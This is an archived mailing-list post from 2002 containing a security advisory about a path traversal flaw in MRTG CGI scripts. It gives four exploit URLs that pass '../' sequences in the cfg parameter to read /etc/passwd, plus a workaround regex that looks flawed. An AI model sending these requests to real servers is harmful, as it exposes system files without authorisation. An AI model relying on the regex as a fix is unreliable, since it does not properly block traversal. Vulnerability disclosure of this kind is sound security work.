new advisory

• Previous message: David Choi: "Re: Vulnerability in all versions of DCForum from dcscripts.com"
• Next in thread: sjat_private: "RE: new advisory"
• Reply: sjat_private: "RE: new advisory"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                    ---=== UkR Security Team advisory 
===---
                   
Name          : MRTG CGI script "show files" Vulnerability
About         : The Multi Router Traffic Grapher (MRTG) is 
a tool to monitor the traffic
                 load on network-links. MRTG generates 
HTML pages containing GIF
                 images which provide a LIVE visual 
representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem       : Problem lyes in incorrect validation of 
user submitted
                 -by-browser information, that can show 
first string of any file of the
                 system where script installed. 
Workaround    : this will help in somewhat : $input =~ 
s/[(\.\.)|\/]//g;
Author        : UkR-XblP / UkR security team
Exploit       : 
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
                 http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
                 http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
                 http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru

• Next message: _kiss_at_private: "KICQ 2.0.0b1 can be remotely crashed"
• Previous message: David Choi: "Re: Vulnerability in all versions of DCForum from dcscripts.com"
• Next in thread: sjat_private: "RE: new advisory"
• Reply: sjat_private: "RE: new advisory"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Feb 02 2002 - 08:48:48 PST